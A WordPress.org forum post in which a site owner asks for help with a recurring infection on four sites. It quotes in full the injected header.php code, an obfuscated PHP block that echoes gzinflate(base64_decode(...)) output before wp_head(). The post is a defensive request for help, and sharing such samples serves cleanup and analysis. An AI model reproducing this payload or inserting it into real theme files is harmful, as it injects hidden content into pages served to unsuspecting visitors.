WordPress.org

Ready to get started?Download WordPress

Forums

Malware in header.php? (1 post)

  1. Chris Demetriad
    Member
    Posted 2 years ago #

    Four different websites got infected and been blocked by Google, and after a quick look, I've noticed this just before wp_head():

    <?php
        #d93065#
        echo(gzinflate(base64_decode("tVVNj5swEP0t5RJoRIoN/kBe99Ceeu4RcYgI2Z1VNlCgiVbR/veOByebbEm6qrRKQsb2+M2bmWd811cdtMPXyqYxM2BjFrN5ZVrbLru+/rEdDKzDNgwSFswDjr80iKy1Oo2G7vnwrWk29XIbRkXQdrjYDM2Af89tHZSLXy/Vcqgewvq+3t/3q+iASHvYrpr9YtVUv5/q7RCtbTGLUw7uJzOQDOIcYgYiB5WA0KAkSA0yAYkzAgRI7kZocpxWtHK2rjLgAnQCWQpCOudUkUE+CBxzEIqwc+eGQzQRD4SzNDJB3COjV1YqfUVBG4ESYPrCWWeOu2OiHA0XLp8CvJ6a0g4bA+LIs1XA8gkKiIwh3IwGTlnIlNLHLwOGZcEPpocD98wJmgIJt8tFJgYJmRReAy0yQqI6xbQNgwtywPkxFO7zyzjl6GfUFCLw1kNRMjrxrRqXlaIkM8ImWyqfNno69qkPK3JfH6w1knJ8s2OBMp8RowYLKroaqy99BdlJIszNoKciJEFI7DSBnDijSk/UmlMbJtt9NnSbqJRCX7CL8xsKmlCHomycQ+5PA6d2X1eNGFWT0D5Ke/JkjNqfkBIfc8Np4XXr+pgd5ZT6Lp2KOgKd5Id2+kECvOB1LiPxDwmdjsQbFeHkdcQr8hqxrinsFuK59LzwbzM4ynLa+b2NuTyyx/b4I/k/rf77lE+Bvv8194FvcEGHgJGKRrVhA6VXAsYSdLnIybf3rCySctG3GxjCGcwis7NBjZfZbomPTWBe8PraRbUdr7BiV5q9XZveFqXp7M+hg+29WTddaIRUnywYmFsWHR7R6m0/74pgjTh0ST59x+fD0tnOalZ4W4b74rH8zOYZiyhSHdVhH5m7L/5+/gM=")));
        #/d93065#
        wp_head(); ?>

    I have cleaned the code but this reappeared after a few hours. Then again and again. I thought that timthumb is the culprit, but this happened on a WordPress without timthumb aswell as I've scanned it previously with timthumb vulnerability scanner.

    There's nothing suspicious in htaccess, wp-config and the files everyone is talking about, from wp-includes, have checked all the js files, nothing, nothing, nothing.

    **What could it be, how do I get rid of this?**

Topic Closed

This topic has been closed to new replies.

About this Topic